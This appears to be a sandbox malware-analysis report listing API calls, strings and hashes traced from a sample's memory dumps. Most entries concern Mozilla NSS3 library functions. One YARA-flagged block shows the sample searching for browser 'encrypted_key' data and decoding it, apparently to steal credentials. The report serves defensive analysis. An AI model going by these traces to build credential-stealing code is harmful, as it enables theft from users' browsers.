                                                                                                                                                                                            • Part of subcall function 6C4594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4594EE
                                                                                                                                                                                            • Part of subcall function 6C4594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C459508
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C45ECA1
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C45ECAE
                                                                                                                                                                                          • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C45ECC5
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C45ED0A
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C45ED19
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C45ED28
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C45ED2F
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C45ED59
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • [I %d/%d] profiler_ensure_started, xrefs: 6C45EC94
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                          • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_InitToken), ref: 6C562CEC
                                                                                                                                                                                          • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C562D07
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_Now.NSS3 ref: 6C640A22
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C640A35
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C640A66
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_GetCurrentThread.NSS3 ref: 6C640A70
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C640A9D
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C640AC8
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_vsmprintf.NSS3(?,?), ref: 6C640AE8
                                                                                                                                                                                            • Part of subcall function 6C6409D0: EnterCriticalSection.KERNEL32(?), ref: 6C640B19
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C640B48
                                                                                                                                                                                            • Part of subcall function 6C6409D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C640C76
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_LogFlush.NSS3 ref: 6C640C7E
                                                                                                                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C562D22
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(?), ref: 6C640B88
                                                                                                                                                                                            • Part of subcall function 6C6409D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C640C5D
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C640C8D
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640C9C
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(?), ref: 6C640CD1
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C640CEC
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640CFB
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C640D16
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C640D26
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640D35
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C640D65
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C640D70
                                                                                                                                                                                            • Part of subcall function 6C6409D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C640D90
                                                                                                                                                                                            • Part of subcall function 6C6409D0: free.MOZGLUE(00000000), ref: 6C640D99
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C562D3B
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C640BAB
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640BBA
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640D7E
                                                                                                                                                                                          • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C562D54
                                                                                                                                                                                            • Part of subcall function 6C6409D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C640BCB
                                                                                                                                                                                            • Part of subcall function 6C6409D0: EnterCriticalSection.KERNEL32(?), ref: 6C640BDE
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(?), ref: 6C640C16
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                          • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$ndl
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00035845
                                                                                                                                                                                          • _memset.LIBCMT ref: 00035856
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00035881
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0003589F
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 000358B3
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 000358C6
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031D92: GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                            • Part of subcall function 0002819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0002CC90,?,?), ref: 000281E5
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 000321E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0003595C,?), ref: 000321F2
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000), ref: 0003596A
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00035A8C
                                                                                                                                                                                            • Part of subcall function 00028048: CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028060
                                                                                                                                                                                            • Part of subcall function 00028048: LocalAlloc.KERNEL32(00000040,?,?,?,00026724,?), ref: 0002806E
                                                                                                                                                                                            • Part of subcall function 00028048: CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028084
                                                                                                                                                                                            • Part of subcall function 00028048: LocalFree.KERNEL32(?,?,?,00026724,?), ref: 00028093
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00035A18
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056645), ref: 00035A35
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035A54
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056A8C), ref: 00035A65
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4109952398-0
                                                                                                                                                                                          • Opcode ID: 696a071f6b733fa673fa08a6238210dd8d5f1af26888f18724857198fb085d01
                                                                                                                                                                                          • Instruction ID: f16dd5f103a38c1d23aa697ead09fa072cc423f10ecec41e66b6fc0feec8a7f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 696a071f6b733fa673fa08a6238210dd8d5f1af26888f18724857198fb085d01
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74713BB5C4022D9BDF61DF60DC45ACEB7BAAB98310F0405E5E908A3251EB329FA58F51
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C602D9F
                                                                                                                                                                                            • Part of subcall function 6C4BCA30: EnterCriticalSection.KERNEL32(?,?,?,6C51F9C9,?,6C51F4DA,6C51F9C9,?,?,6C4E369A), ref: 6C4BCA7A
                                                                                                                                                                                            • Part of subcall function 6C4BCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4BCB26
                                                                                                                                                                                          • sqlite3_exec.NSS3(?,?,6C602F70,?,?), ref: 6C602DF9
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C602E2C
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602E3A
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602E52
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C66AAF9,?), ref: 6C602E62
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602E70
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602E89
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602EBB
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602ECB
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C602F3E
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602F4C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1957633107-0
                                                                                                                                                                                          • Opcode ID: 65b7858ed1c9ad673fed05c3d14804af26b8b0af89b1e51779a816794fa52740
                                                                                                                                                                                          • Instruction ID: 14fce65aba24c5aad106615b4ddfc950623b6234e8f98fae625231aaae60b6bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65b7858ed1c9ad673fed05c3d14804af26b8b0af89b1e51779a816794fa52740
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0616BB5E002068BEB04CFA8D984B9EB7B5EF59348F144428EC55B7B41E731E845CBA5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4C97
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CB0
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CC9
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D11
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D2A
                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D4A
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D57
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D97
                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4DBA
                                                                                                                                                                                          • PR_WaitCondVar.NSS3 ref: 6C4B4DD4
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4DE6
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4DEF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3388019835-0
                                                                                                                                                                                          • Opcode ID: 643b4f6b8b806219b7dc5980479c761a44e14aa53a4f637db5eee4d2bf790c5a
                                                                                                                                                                                          • Instruction ID: c3884230cd982c4ee4f7835a220294584677b7ac49cb34355b720f416ce91351
                                                                                                                                                                                          • Opcode Fuzzy Hash: 643b4f6b8b806219b7dc5980479c761a44e14aa53a4f637db5eee4d2bf790c5a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E41A0B5A04711CFCB00EF79C884D5977F8BF46354F164629D898A7700E730E885CBA5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3833677464-0
                                                                                                                                                                                          • Opcode ID: a2c9c4f1816dfd6ec6938e27141477249c0c90ab003bc2787292d758f6a6ea07
                                                                                                                                                                                          • Instruction ID: f11a9d47624d1f0427d550f79c96c9ccbf74c7442458248e16b3e8878cd41248
                                                                                                                                                                                          • Opcode Fuzzy Hash: a2c9c4f1816dfd6ec6938e27141477249c0c90ab003bc2787292d758f6a6ea07
                                                                                                                                                                                          • Instruction Fuzzy Hash: BB2174F5104601AEDB727B25D802A9EB7E5DF92B60B20C83AF58456163EF329C10DB9D
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000215BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 000215C6
                                                                                                                                                                                            • Part of subcall function 000215BC: HeapAlloc.KERNEL32(00000000), ref: 000215CD
                                                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00021606
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0002160C
                                                                                                                                                                                          • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00021614
                                                                                                                                                                                          • GetWindowContextHelpId.USER32(00000000), ref: 0002161B
                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,00000000), ref: 00021623
                                                                                                                                                                                          • RegisterClassW.USER32(00000000), ref: 0002162A
                                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 00021631
                                                                                                                                                                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 00021638
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00021644
                                                                                                                                                                                          • IsDialogMessageW.USER32(00000000,00000000), ref: 0002164C
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00021656
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002165D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3627164727-0
                                                                                                                                                                                          • Opcode ID: 4dccd86edead0babde2c1256cf6e7fd906450d9e04d723ca1ed3207d5db2a560
                                                                                                                                                                                          • Instruction ID: f73e579ce9db78cb76b7385455b5f6be11851ed5fea856e0ddfcafa74797d434
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dccd86edead0babde2c1256cf6e7fd906450d9e04d723ca1ed3207d5db2a560
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5014272402A24FBE7126BA1AD0DDDF3E6CEF4A363B041045F60A910618B7C5602CBFA
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C554E90
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C554EA9
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C554EC6
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C554EDF
                                                                                                                                                                                          • PL_HashTableLookup.NSS3 ref: 6C554EF8
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C554F05
                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C554F13
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C554F3A
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207AD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207CD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207D6
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4B204A), ref: 6C5207E4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,6C4B204A), ref: 6C520864
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C520880
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,6C4B204A), ref: 6C5208CB
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208D7
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                          • String ID: bUUl$bUUl
                                                                                                                                                                                          • API String ID: 326028414-3411056490
                                                                                                                                                                                          • Opcode ID: 1356b22ca2578281938e9916613030d06d0030d3e3db21a18935185548cfc436
                                                                                                                                                                                          • Instruction ID: 85cdcd1c1da2f2215a757643a85d81a6c69d22e4570fa70b5a4973f557851959
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1356b22ca2578281938e9916613030d06d0030d3e3db21a18935185548cfc436
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E414DB4A00605DFCB00EF69C48486ABBF4FF49304B158669DC599B710EB30E865CFA5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_DigestInit), ref: 6C566C66
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C566C94
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C566CA3
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C566CB9
                                                                                                                                                                                          • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C566CD5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$ndl
                                                                                                                                                                                          • API String ID: 1003633598-2059001174
                                                                                                                                                                                          • Opcode ID: 7d88505b59091095326b8beb65ba870c1f04cc4776353c6aeaa86292b66e95fa
                                                                                                                                                                                          • Instruction ID: 6d9aaf98192a786efd30d4dd06c2cb0c62654f0abc5f30228c9dbd84153432d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d88505b59091095326b8beb65ba870c1f04cc4776353c6aeaa86292b66e95fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE21E131A01215ABDB009F26DD89B9A37B5EB9631CF448025E50997F22DF309958CB9E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C413492
                                                                                                                                                                                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C4134A9
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C4134EF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C41350E
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 6C413522
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C413552
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C41357C
                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C413592
                                                                                                                                                                                            • Part of subcall function 6C44AB89: EnterCriticalSection.KERNEL32(6C49E370,?,?,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284), ref: 6C44AB94
                                                                                                                                                                                            • Part of subcall function 6C44AB89: LeaveCriticalSection.KERNEL32(6C49E370,?,6C4134DE,6C49F6CC,?,?,?,?,?,?,?,6C413284,?,?,6C4356F6), ref: 6C44ABD1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                          • API String ID: 3634367004-706389432
                                                                                                                                                                                          • Opcode ID: 34e0f47ce2ef951c31944259bd91d844f92539f41b924d3108b129d2f74fb372
                                                                                                                                                                                          • Instruction ID: af7be456bb758b818230f79c0d757f497b1da7b3711ab4de9aa92ca9c0d21e97
                                                                                                                                                                                          • Opcode Fuzzy Hash: 34e0f47ce2ef951c31944259bd91d844f92539f41b924d3108b129d2f74fb372
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0331AF71B012299BEF14EFB9C848FBA77B9FB55715F104029E645A3B50EB30AD05CB60
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C57DE64), ref: 6C57ED0C
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C57ED22
                                                                                                                                                                                            • Part of subcall function 6C58B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6618D0,?), ref: 6C58B095
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C57ED4A
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C57ED6B
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C57ED38
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: TlsGetValue.KERNEL32(?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4C97
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CB0
                                                                                                                                                                                            • Part of subcall function 6C4B4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CC9
                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C57ED52
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C57ED83
                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C57ED95
                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C57ED9D
